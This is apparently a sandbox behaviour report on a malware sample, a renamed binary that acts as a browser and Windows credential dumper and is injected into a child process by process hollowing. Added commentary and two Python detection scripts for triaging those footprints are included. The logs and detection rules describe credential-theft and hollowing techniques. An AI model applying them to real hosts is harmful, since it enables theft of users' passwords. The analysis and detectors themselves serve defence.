private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x400000, size = 102400 True 1
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7efde008, size = 4 True 1
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7efdf010, size = 4 True 1
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c os_tid = 0x608, address = 0x0 True 1
Threads
Thread 0x608
47 0
Category Operation Information Success Count
System Get Time type = System Time, time = 2018-06-25 14:54:23 (UTC) True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75fc4f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75fc359f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75fc1252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75fc4208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75fc4d28 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x7604410b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76044195 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75fcd31f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75fdee7e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77c2441c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c4c50e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77c4c381 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75fdf088 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77c305d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77c4ca24 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77c00b8c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77cbfde8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c51e1d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76044761 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x7603cd11 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7604424f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x760446b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76056676 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76044751 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x760565f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x760447c1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x760447e1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x760447f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75fdeee0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = DLLPathEx, data = 67 True 1
Module Load module_name = C:\PROGRA~2\MICROS~1\Office12\OLMAPI32.DLL, base_address = 0x6feb0000 True 1
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, desired_access = FILE_APPEND_DATA True 1
COM Create interface = 9240A6CD-AF41-11D2-8C3B-00104B2A6676, cls_context = CLSCTX_INPROC_SERVER True 1
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, size = 50 True 1
Module Get Handle module_name = mscoree.dll False 1
Process #11: syncpack.exe
405 0
Information Value
ID #11
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
Information Value
PID 0x728
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x730, 0x7D4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00210fff Pagefile Backed Memory Readable, Writable True False False -
rsaenh.dll 0x00220000 0x0025bfff Memory Mapped File Readable False False False -
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False -
tzres.dll 0x00260000 0x00260fff Memory Mapped File Readable False False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00268fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00276fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00291fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00328fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0045afff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x0065ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007f0000 0x007f0000 0x00970fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000980000 0x00980000 0x01d7ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d80000 0x01d80000 0x01e7ffff Private Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f2ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01f30000 0x021fefff Memory Mapped File Readable False False False -
private_0x0000000002200000 0x02200000 0x02300fff Private Memory Readable, Writable True False False -
nss3.dll 0x02200000 0x023b1fff Memory Mapped File Readable False False False -
private_0x0000000002200000 0x02200000 0x0236ffff Private Memory Readable, Writable True False False -
private_0x0000000002200000 0x02200000 0x022fffff Private Memory Readable, Writable True False False -
private_0x0000000002330000 0x02330000 0x0236ffff Private Memory Readable, Writable True False False -
private_0x0000000002370000 0x02370000 0x0246ffff Private Memory Readable, Writable True False False -
private_0x0000000002470000 0x02470000 0x0256ffff Private Memory Readable, Writable True False False -
private_0x0000000002500000 0x02500000 0x025fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002600000 0x02600000 0x029f2fff Pagefile Backed Memory Readable True False False -
msvcp100.dll 0x6fe00000 0x6fe68fff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x6fe40000 0x6fe53fff Memory Mapped File Readable, Writable, Executable False False False -
pstorec.dll 0x6fe60000 0x6fe6cfff Memory Mapped File Readable, Writable, Executable False False False -
mozglue.dll 0x6fec0000 0x6fee1fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x6fef0000 0x6ffadfff Memory Mapped File Readable, Writable, Executable False False False -
wsock32.dll 0x6ffb0000 0x6ffb6fff Memory Mapped File Readable, Writable, Executable False False False -
nss3.dll 0x6ffc0000 0x70174fff Memory Mapped File Readable, Writable, Executable False False False -
vaultcli.dll 0x70180000 0x7018bfff Memory Mapped File Readable, Writable, Executable False False False -
winmm.dll 0x70250000 0x70281fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
softokn3.dll 0x74690000 0x746b6fff Memory Mapped File Readable, Writable, Executable False False False -
freebl3.dll 0x74a30000 0x74a7efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x75020000 0x750a3fff Memory Mapped File Readable, Writable, Executable False False False -
nssdbm3.dll 0x750d0000 0x750e6fff Memory Mapped File Readable, Writable, Executable False False False -
freebl3.dll 0x755d0000 0x7561efff Memory Mapped File Readable, Writable, Executable False False False -
nssdbm3.dll 0x755d0000 0x755e6fff Memory Mapped File Readable, Writable, Executable False False False -
softokn3.dll 0x755f0000 0x75616fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75f30000 0x75faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
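The Region table above is worth reading as a whole: Firefox's NSS stack (nss3.dll, softokn3.dll, freebl3.dll, nssdbm3.dll, mozglue.dll) is mapped into a process that lives in %LOCALAPPDATA%\Microsoft\Windows, next to vaultcli.dll (Credential Manager vault) and pstorec.dll (legacy Protected Storage), and the command line tells the binary to write a comma-separated report with /scomma to a .tmp file under %TEMP%. Together with the LoadPasswords* config keys and the nss3.dll exports (NSS_Init, PK11_Authenticate, PK11SDR_Decrypt) resolved in the thread log below, this is the footprint of a browser password dumper run from a renamed copy. The Python below is an added triage rule written for this page, not code from the report or from VMRay; the two records are constructed from the values on this page plus a benign Firefox control, and the report switches other than /scomma are assumed from the same NirSoft-style tool family.

```python
"""
Added example (not part of the VMRay report): a triage rule for the browser
credential-dumping footprint shown by this process. Records are constructed
from values on the page plus a benign Firefox control.
"""
import ntpath
import re

# Firefox's NSS crypto stack. Firefox loads these from its own install
# directory; the same DLLs inside an unrelated binary is the classic
# footprint of a Firefox password extractor (it needs PK11SDR_Decrypt).
NSS_MODULES = {"nss3.dll", "softokn3.dll", "freebl3.dll", "nssdbm3.dll", "mozglue.dll"}

# Windows credential stores: Credential Manager vault (vaultcli.dll) and the
# legacy Protected Storage (pstorec.dll).
CREDENTIAL_STORE_MODULES = {"vaultcli.dll", "pstorec.dll"}

# Report-to-file switches. /scomma is the one on the page; the rest are
# assumed from the same NirSoft-style tool family.
SAVE_SWITCHES = {"/scomma", "/stext", "/stab", "/shtml", "/sverhtml", "/sxml"}

_TOKEN = re.compile(r'"[^"]*"|\S+')


def split_cmdline(cmdline: str) -> list:
    """Split a Windows command line, keeping quoted paths whole."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def triage_process(record: dict) -> dict:
    """Score one process record.

    record keys (mirroring the report): image, cmdline, modules (DLL names
    from the Region table), created ('Is Created or Modified Executable').
    """
    image = record["image"].lower()
    names = {ntpath.basename(m).lower() for m in record["modules"]}
    indicators = {}

    # NSS mapped into something that is not installed in the Firefox directory.
    nss_hits = sorted(names & NSS_MODULES)
    if nss_hits and "\\mozilla firefox\\" not in image:
        indicators["nss_outside_firefox"] = ", ".join(nss_hits)

    store_hits = sorted(names & CREDENTIAL_STORE_MODULES)
    if store_hits:
        indicators["credential_store_api"] = ", ".join(store_hits)

    # A save switch names the output file; that file is the artifact to collect.
    argv = split_cmdline(record["cmdline"])
    for i, arg in enumerate(argv):
        if arg.lower() in SAVE_SWITCHES:
            out = argv[i + 1] if i + 1 < len(argv) else "<missing>"
            indicators["report_to_file"] = f"{arg.lower()} {out}"
            break

    # A freshly written executable under a system-looking, user-writable path.
    if record.get("created") and "\\appdata\\local\\microsoft\\windows\\" in image:
        indicators["dropped_in_local_appdata"] = record["image"]

    if "nss_outside_firefox" in indicators and any(
            k in indicators for k in ("credential_store_api", "report_to_file")):
        verdict = "browser_credential_dump"
    elif indicators:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": indicators}


# Constructed from this report: process #11's image, command line and the
# DLLs in its Region table.
SYNCPACK = {
    "image": r"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe",
    "cmdline": (r'"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" '
                r'/scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"'),
    "modules": ["nss3.dll", "softokn3.dll", "freebl3.dll", "nssdbm3.dll", "mozglue.dll",
                "vaultcli.dll", "pstorec.dll", "wininet.dll", "crypt32.dll", "kernel32.dll"],
    "created": True,
}
# Constructed benign control: Firefox loading its own NSS from its install dir.
FIREFOX = {
    "image": r"C:\Program Files (x86)\Mozilla Firefox\firefox.exe",
    "cmdline": r'"C:\Program Files (x86)\Mozilla Firefox\firefox.exe"',
    "modules": ["nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll", "kernel32.dll"],
    "created": False,
}

if __name__ == "__main__":
    for rec in (SYNCPACK, FIREFOX):
        print(ntpath.basename(rec["image"]), triage_process(rec))
```

The module-based check is deliberately independent of the binary's name or hash: the dropper can rename the tool freely, but a password extractor cannot avoid loading NSS to call PK11SDR_Decrypt, and the /scomma output file is what you want to grab from the host before it is exfiltrated or deleted.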
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x400000, size = 372736 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 os_tid = 0x730, address = 0x0 True 1
Fn
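The four injection rows above describe the parent syncpack.exe (#6, thread 0x868) writing a 372736-byte buffer into this child's 0x400000 region, which the Region table lists as private RWX memory rather than a memory-mapped image, then writing 4 bytes at 0x7efde008 and redirecting the child's primary thread 0x730. That sequence is the process-hollowing pattern: a suspended copy of itself, the original image replaced, and the thread context repointed at the new entry. The Python below is an added example written for this page, not part of the report; it parses rows in this report's own format and applies that heuristic. Reading 0x7efde008 as PEB.ImageBaseAddress assumes the 32-bit PEB of this WoW64 process sits at 0x7efde000 on the Windows 7 guest, which is consistent with the single private page listed at that address but is an assumption, not something the report states.

```python
"""
Added example (not part of the VMRay report): a process-hollowing heuristic
over the Injection Information and Region rows of this process, in the
report's own row format. Sample rows are copied from the page.
"""
import re

INJECTION_ROW = re.compile(
    r"^(?P<type>Modify Memory|Modify Control Flow)\s+"
    r"#(?P<src_id>\d+):\s+(?P<src_image>\S+)\s+(?P<src_tid>0x[0-9a-fA-F]+)\s+"
    r"(?P<info>.*?)\s+(?P<success>True|False)\s+(?P<count>\d+)\s*$"
)
REGION_ROW = re.compile(
    r"^(?P<name>\S+)\s+(?P<start>0x[0-9a-fA-F]+)\s+(?P<end>0x[0-9a-fA-F]+)\s+"
    r"(?P<type>Private Memory|Pagefile Backed Memory|Memory Mapped File)\s+"
    r"(?P<perms>(?:Readable|Writable|Executable)(?:,\s*(?:Readable|Writable|Executable))*)"
)

# Assumption for this Windows 7 x64 guest: the 32-bit PEB of a WoW64 process
# sits at 0x7efde000 (the single private page listed there in the Region
# table); PEB.ImageBaseAddress is at offset 0x8 in the 32-bit layout.
PEB32_BASE = 0x7EFDE000
PEB32_IMAGEBASE = PEB32_BASE + 0x8


def _parse_info(info: str) -> dict:
    """'address = 0x400000, size = 372736' -> {'address': 4194304, 'size': 372736}"""
    pairs = (kv.split(" = ", 1) for kv in info.split(", "))
    return {k.strip(): int(v, 0) for k, v in pairs}


def parse_injections(text: str) -> list:
    rows = []
    for line in text.strip().splitlines():
        m = INJECTION_ROW.match(line.strip())
        if m:
            rows.append({"type": m["type"], "src_id": int(m["src_id"]),
                         "src_image": m["src_image"], "src_tid": int(m["src_tid"], 16),
                         "info": _parse_info(m["info"]), "success": m["success"] == "True"})
    return rows


def parse_regions(text: str) -> list:
    regions = []
    for line in text.strip().splitlines():
        m = REGION_ROW.match(line.strip())
        if m:
            regions.append({"name": m["name"], "start": int(m["start"], 16),
                            "end": int(m["end"], 16), "type": m["type"],
                            "perms": {p.strip() for p in m["perms"].split(",")}})
    return regions


def _region_at(regions, addr):
    return next((r for r in regions if r["start"] <= addr <= r["end"]), None)


def detect_hollowing(injections, regions, target_image, target_tids) -> dict:
    """Apply the hollowing heuristic to one target process; returns findings plus a verdict."""
    findings = {}
    for inj in injections:
        if not inj["success"]:
            continue
        if inj["src_image"].lower() == target_image.lower():
            findings["self_spawned"] = inj["src_image"]  # parent wrote into a copy of itself
        if inj["type"] == "Modify Memory":
            addr, size = inj["info"]["address"], inj["info"]["size"]
            region = _region_at(regions, addr)
            # An image base backed by private RWX memory instead of the mapped
            # file means the original PE was unmapped and a new one written in.
            if (region and size >= 0x1000 and region["type"] == "Private Memory"
                    and "Executable" in region["perms"]):
                findings["image_replaced"] = f"{size} bytes at {addr:#x} into {region['name']}"
            # A 4-byte write to PEB.ImageBaseAddress repoints the loader at the new image.
            if size == 4 and addr == PEB32_IMAGEBASE:
                findings["peb_imagebase_patched"] = f"{addr:#x}"
        elif inj["type"] == "Modify Control Flow":
            tid = inj["info"].get("os_tid")
            if tid in target_tids:
                # SetThreadContext-style redirection of the suspended primary thread.
                findings["thread_context_hijacked"] = (
                    f"tid {tid:#x} -> {inj['info'].get('address', 0):#x}")
    hollow = {"image_replaced", "thread_context_hijacked"}.issubset(findings)
    findings["verdict"] = "process_hollowing" if hollow else "no_hollowing_pattern"
    return findings


# Copied from this process's Injection Information table.
INJECTION_ROWS = r"""
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x400000, size = 372736 True 1
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efde008, size = 4 True 1
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efdf010, size = 4 True 1
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 os_tid = 0x730, address = 0x0 True 1
"""
# Copied from the Region table (only the rows the heuristic needs).
REGION_ROWS = r"""
private_0x0000000000400000 0x00400000 0x0045afff Private Memory Readable, Writable, Executable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
"""
TARGET_IMAGE = r"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe"
TARGET_TIDS = {0x730, 0x7D4}  # thread IDs of process #11


def analyse() -> dict:
    return detect_hollowing(parse_injections(INJECTION_ROWS),
                            parse_regions(REGION_ROWS), TARGET_IMAGE, TARGET_TIDS)


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```

Note that the 372736-byte write covers the 0x400000-0x45afff region exactly (0x5b000 bytes), so the region entry is the written payload; dumping that range from the child is the quickest way to recover the unpacked second stage, since the file on disk is only the packed loader.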
Threads
Thread 0x730
342 0
Category Operation Information Success Count Logfile
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Module Load module_name = comctl32.dll, base_address = 0x75020000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x75026be6 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x764a0468 True 1
Fn
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_lng.ini, type = file_attributes False 1
Fn
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 18
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ShowInfoTip, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
